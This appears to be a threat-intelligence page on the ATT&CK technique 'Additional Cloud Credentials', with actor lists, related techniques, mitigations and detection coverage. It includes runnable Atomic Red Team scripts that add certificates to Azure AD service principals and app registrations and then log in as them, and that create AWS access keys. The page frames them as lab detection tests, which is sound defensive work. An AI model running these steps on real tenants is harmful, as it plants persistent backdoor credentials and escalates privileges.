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ATT&CK Technique

Additional Cloud Credentials

T1098.001 · persistence, privilege-escalation

Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment. For example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure / Entra ID. These credentials include both x509 keys and passwords.

With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules. In infrastructure-as-a-service (IaaS) environments, after gaining access through Cloud Accounts, adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP. This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.

Adversaries may also use the CreateAccessKey API in AWS or the gcloud iam service-accounts keys create command in GCP to add access keys to an account. Alternatively, they may use the CreateLoginProfile API in AWS to add a password that can be used to log into the AWS Management Console for Cloud Service Dashboard. If the target account has different permissions from the requesting account, the adversary may also be able to escalate their privileges in the environment (i.e.

Cloud Accounts). For example, in Entra ID environments, an adversary with the Application Administrator role can add a new set of credentials to their application's service principal. In doing so the adversary would be able to access the service principal’s roles and permissions, which may be different from those of the Application Administrator.

In AWS environments, adversaries with the appropriate permissions may also use the sts:GetFederationToken API call to create a temporary set of credentials to Forge Web Credentials tied to the permissions of the original user account. These temporary credentials may remain valid for the duration of their lifetime even if the original account’s API credentials are deactivated. In Entra ID environments with the app password feature enabled, adversaries may be able to add an app password to a user account.

As app passwords are intended to be used with legacy devices that do not support multi-factor authentication (MFA), adding an app password can allow an adversary to bypass MFA requirements. Additionally, app passwords may remain valid even if the user’s primary password is reset.

IaaSIdentity ProviderSaaS

Actors Using This

10
russiaAPT29
chinaChimera (G0114)
north_koreaContagious Interview
russiaDragonfly
predominantly_english_speaking_youth_organized_crimeLAPSUS$
iranPioneer Kitten
predominantly_westernScattered Spider
turkeySea Turtle
chinaSilk Typhoon
russiaStar Blizzard

Likely Attack Path

Techniques the same actors pair with this one distinctively - those showing up among actors who use this technique noticeably more than across all actors (lift > 1.15), grouped by kill-chain phase. The × is that lift multiplier; the shared-actor count is in the tooltip. A near-universal technique pairs with everything at baseline, so its list is short by design.
persistence same
T1556.006 · Multi-Factor Authentication ×23.80T1136.003 · Cloud Account ×23.80T1556.007 · Hybrid Identity ×19.04T1098.005 · Device Registration ×13.88T1556 · Modify Authentication Process ×12.69
credential-access later
T1606.002 · SAML Tokens ×19.04T1621 · Multi-Factor Authentication Request Generation ×17.85T1555.005 · Password Managers ×14.28T1606.001 · Web Cookies ×14.28T1528 · Steal Application Access Token ×13.60T1110.004 · Credential Stuffing ×11.90
discovery later
T1087.004 · Cloud Account ×19.04
lateral-movement later
T1021.007 · Cloud Services ×23.80
collection later
T1074.002 · Remote Data Staging ×11.90
other same
T1562.008 · Disable or Modify Cloud Logs ×23.80

Atomic Tests

3
Executable Atomic Red Team test cases for exercising this technique in a lab. Copy a command, run it on the listed platform, confirm your detections fire.
powershellazure-adAzure AD Application Hijacking - Service Principal
Add a certificate to an Application through its Service Principal. The certificate can then be used to authenticate as the application. This can be used for persistence, and also for privilege escalation by benefiting from the Application's rights. An account with high-enough Azure AD privileges is needed, such as Global Administrator or Application Administrator. The account authentication must be without MFA. 
Import-Module -Name AzureAD
$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
Connect-AzureAD -Credential $Credential > $null

$sp = Get-AzureADServicePrincipal -SearchString "#{service_principal_name}" | Select-Object -First 1
if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }

# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
$credNotAfter = (Get-Date).AddDays(1)
$certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry

$cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter
$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
Write-Host "Generated certificate ""$($cert.Thumbprint)"""

New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter

Start-Sleep -s 30
$tenant = Get-AzureADTenantDetail
$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $cert.Thumbprint
Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
Write-Host "End of Hijacking"
powershellazure-adAzure AD Application Hijacking - App Registration
Add a certificate to an Application through its App Registration. The certificate can then be used to authenticate as the application. This can be used for persistence, and also for privilege escalation by benefiting from the Application's rights. An account with high-enough Azure AD privileges is needed, such as Global Administrator or Application Administrator. The account authentication must be without MFA. 
Import-Module -Name AzureAD
$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
Connect-AzureAD -Credential $Credential > $null

$app = Get-AzureADApplication -SearchString "#{application_name}" | Select-Object -First 1
if ($app -eq $null) { Write-Warning "Application not found"; exit }

# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
$credNotAfter = (Get-Date).AddDays(1)
$certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry

$cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter
$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
Write-Host "Generated certificate ""$($cert.Thumbprint)"""

New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter

Start-Sleep -s 30
$tenant = Get-AzureADTenantDetail
$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $cert.Thumbprint
Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
Write-Host "End of Hijacking"
shiaas:awsAWS - Create Access Key and Secret Key
Adversaries create their own new access and secret keys to programatically interact with AWS environment, which is already compromised 
aws iam create-access-key --user-name #{username} > "$PathToAtomicsFolder/T1098.001/bin/aws_secret.creds"
cd "$PathToAtomicsFolder/T1098.001/bin/"
./aws_secret.sh

Mitigations

5
MITRE ATT&CK mitigations - vendor-agnostic guidance for reducing exposure to this technique.
M1018User Account Management

User Account Management involves implementing and enforcing policies for the lifecycle of user accounts, including creation, modification, and deactivation. Proper account management reduces the attack surface by limiting unauthorized access, managing account privileges, and ensuring accounts are used according to organizational policies.

Enforcing the Principle of Least Privilege
  • Implementation: Assign users only the minimum permissions required to perform their job functions. Regularly audit accounts to ensure no excess permissions are granted.
  • Use Case: Reduces the risk of privilege escalation by ensuring accounts cannot perform unauthorized actions. Implementing Strong Password Policies.
  • Implementation: Enforce password complexity requirements (e.g., length, character types). Require password expiration every 90 days and disallow password reuse.
  • Use Case: Prevents adversaries from gaining unauthorized access through password guessing or brute force attacks. Managing Dormant and Orphaned Accounts.
  • Implementation: Implement automated workflows to disable accounts after a set period of inactivity (e.g., 30 days). Remove orphaned accounts (e.g., accounts without an assigned owner) during regular account audits.
  • Use Case: Eliminates dormant accounts that could be exploited by attackers. Account Lockout Policies.
  • Implementation: Configure account lockout thresholds (e.g., lock accounts after five failed login attempts). Set lockout durations to a minimum of 15 minutes.
  • Use Case: Mitigates automated attack techniques that rely on repeated login attempts. Multi-Factor Authentication (MFA) for High-Risk Accounts.
  • Implementation: Require MFA for all administrative accounts and high-risk users. Use MFA mechanisms like hardware tokens, authenticator apps, or biometrics.
  • Use Case: Prevents unauthorized access, even if credentials are stolen. Restricting Interactive Logins.
  • Implementation: Restrict interactive logins for privileged accounts to specific secure systems or management consoles. Use group policies to enforce logon restrictions.
  • Use Case: Protects sensitive accounts from misuse or exploitation.
Tools for Implementation Built-in Tools
  • Microsoft Active Directory (AD): Centralized account management and RBAC enforcement.
  • Group Policy Object (GPO): Enforce password policies, logon restrictions, and account lockout policies.
Identity and Access Management (IAM) Tools
  • Okta: Centralized user provisioning, MFA, and SSO integration.
  • Microsoft Azure Active Directory: Provides advanced account lifecycle management, role-based access, and conditional access policies.
Privileged Account Management (PAM)
  • CyberArk, BeyondTrust, Thycotic: Manage and monitor privileged account usage, enforce session recording, and JIT access.
M1026Privileged Account Management

Privileged Account Management focuses on implementing policies, controls, and tools to securely manage privileged accounts (e.g., SYSTEM, root, or administrative accounts). This includes restricting access, limiting the scope of permissions, monitoring privileged account usage, and ensuring accountability through logging and auditing.

Account Permissions and Roles
  • Implement RBAC and least privilege principles to allocate permissions securely.
  • Use tools like Active Directory Group Policies to enforce access restrictions.
Credential Security
  • Deploy password vaulting tools like CyberArk, HashiCorp Vault, or KeePass for secure storage and rotation of credentials.
  • Enforce password policies for complexity, uniqueness, and expiration using tools like Microsoft Group Policy Objects (GPO).
Multi-Factor Authentication (MFA)
  • Enforce MFA for all privileged accounts using Duo Security, Okta, or Microsoft Azure AD MFA.
Privileged Access Management (PAM)
  • Use PAM solutions like CyberArk, BeyondTrust, or Thycotic to manage, monitor, and audit privileged access.
Auditing and Monitoring
  • Integrate activity monitoring into your SIEM (e.g., Splunk or QRadar) to detect and alert on anomalous privileged account usage.
Just-In-Time Access
  • Deploy JIT solutions like Azure Privileged Identity Management (PIM) or configure ephemeral roles in AWS and GCP to grant time-limited elevated permissions.
Tools for Implementation Privileged Access Management (PAM)
  • CyberArk, BeyondTrust, Thycotic, HashiCorp Vault.
Credential Management
  • Microsoft LAPS (Local Admin Password Solution), Password Safe, HashiCorp Vault, KeePass.
Multi-Factor Authentication
  • Duo Security, Okta, Microsoft Azure MFA, Google Authenticator.
Linux Privilege Management
  • sudo configuration, SELinux, AppArmor.
Just-In-Time Access
  • Azure Privileged Identity Management (PIM), AWS IAM Roles with session constraints, GCP Identity-Aware Proxy.
M1030Network Segmentation

Network segmentation involves dividing a network into smaller, isolated segments to control and limit the flow of traffic between devices, systems, and applications. By segmenting networks, organizations can reduce the attack surface, restrict lateral movement by adversaries, and protect critical assets from compromise. Effective network segmentation leverages a combination of physical boundaries, logical separation through VLANs, and access control policies enforced by network appliances like firewalls, routers, and cloud-based configurations.

Segment Critical Systems
  • Identify and group systems based on their function, sensitivity, and risk. Examples include payment systems, HR databases, production systems, and internet-facing servers.
  • Use VLANs, firewalls, or routers to enforce logical separation.
Implement DMZ for Public-Facing Services
  • Host web servers, DNS servers, and email servers in a DMZ to limit their access to internal systems.
  • Apply strict firewall rules to filter traffic between the DMZ and internal networks.
Use Cloud-Based Segmentation
  • In cloud environments, use VPCs, subnets, and security groups to isolate applications and enforce traffic rules.
  • Apply AWS Transit Gateway or Azure VNet peering for controlled connectivity between cloud segments.
Apply Microsegmentation for Workloads
  • Use software-defined networking (SDN) tools to implement workload-level segmentation and prevent lateral movement.
Restrict Traffic with ACLs and Firewalls
  • Apply Access Control Lists (ACLs) to network devices to enforce "deny by default" policies.
  • Use firewalls to restrict both north-south (external-internal) and east-west (internal-internal) traffic.
Monitor and Audit Segmented Networks
  • Regularly review firewall rules, ACLs, and segmentation policies.
  • Monitor network flows for anomalies to ensure segmentation is effective.
Test Segmentation Effectiveness
  • Perform periodic penetration tests to verify that unauthorized access is blocked between network segments.
M1032Multi-factor Authentication

Multi-Factor Authentication (MFA) enhances security by requiring users to provide at least two forms of verification to prove their identity before granting access. These factors typically include: - Something you know: Passwords, PINs. - Something you have: Physical tokens, smartphone authenticator apps. - Something you are: Biometric data such as fingerprints, facial recognition, or retinal scans. Implementing MFA across all critical systems and services ensures robust protection against account takeover and unauthorized access.

Identity and Access Management (IAM)
  • Use IAM solutions like Azure Active Directory, Okta, or AWS IAM to enforce MFA policies for all user logins, especially for privileged roles.
  • Enable conditional access policies to enforce MFA for risky sign-ins (e.g., unfamiliar devices, geolocations).
  • Enable Conditional Access policies to only allow logins from trusted devices, such as those enrolled in Intune or joined via Hybrid/Entra.
Authentication Tools and Methods
  • Use authenticator applications such as Google Authenticator, Microsoft Authenticator, or Authy for time-based one-time passwords (TOTP).
  • Deploy hardware-based tokens like YubiKey, RSA SecurID, or smart cards for additional security.
  • Enforce biometric authentication for compatible devices and applications.
Secure Legacy Systems
  • Integrate MFA solutions with older systems using third-party tools like Duo Security or Thales SafeNet.
  • Enable RADIUS/NPS servers to facilitate MFA for VPNs, RDP, and other network logins.
Monitoring and Alerting
  • Use SIEM tools to monitor failed MFA attempts, login anomalies, or brute-force attempts against MFA systems.
  • Implement alerts for suspicious MFA activities, such as repeated failed codes or new device registrations.
Training and Policy Enforcement
  • Educate employees on the importance of MFA and secure authenticator usage.
  • Enforce policies that require MFA on all critical systems, especially for remote access, privileged accounts, and cloud applications.
M1042Disable or Remove Feature or Program

Disable or remove unnecessary and potentially vulnerable software, features, or services to reduce the attack surface and prevent abuse by adversaries. This involves identifying software or features that are no longer needed or that could be exploited and ensuring they are either removed or properly disabled.

Remove Legacy Software
  • Use Case: Disable or remove older versions of software that no longer receive updates or security patches (e.g., legacy Java, Adobe Flash).
  • Implementation: A company removes Flash Player from all employee systems after it has reached its end-of-life date.
Disable Unused Features
  • Use Case: Turn off unnecessary operating system features like SMBv1, Telnet, or RDP if they are not required.
  • Implementation: Disable SMBv1 in a Windows environment to mitigate vulnerabilities like EternalBlue.
Control Applications Installed by Users
  • Use Case: Prevent users from installing unauthorized software via group policies or other management tools.
  • Implementation: Block user installations of unauthorized file-sharing applications (e.g., BitTorrent clients) in an enterprise environment.
Remove Unnecessary Services
  • Use Case: Identify and disable unnecessary default services running on endpoints, servers, or network devices.
  • Implementation: Disable unused administrative shares (e.g., C$, ADMIN$) on workstations.
Restrict Add-ons and Plugins
  • Use Case: Remove or disable browser plugins and add-ons that are not needed for business purposes.
  • Implementation: Disable Java and ActiveX plugins in web browsers to prevent drive-by attacks.

Detection Coverage

1/6 layers
Coverage across standard detection surfaces. Rows marked none have no rule of that type mapped. Some are real blind spots worth closing; others are simply not applicable to this technique (e.g. YARA matches malware files, not network behaviour).
Behavioral / log (Sigma) 3
Analytics (MITRE CAR) none
Runtime / container (Falco) none
File / malware (YARA) none
Network (Suricata/Snort) none
Vuln scan (Nuclei) none

Comply & Defend

NIST 800-53AC-02, AC-03, AC-04, AC-05, AC-06, AC-20, CM-05, CM-06, CM-07, IA-02, IA-05, SC-07, SC-46, SI-04, SI-07
D3FEND12 defensive techniques
Intelligence Graph · click any node to traverse
CVETechnique ActorTool Family
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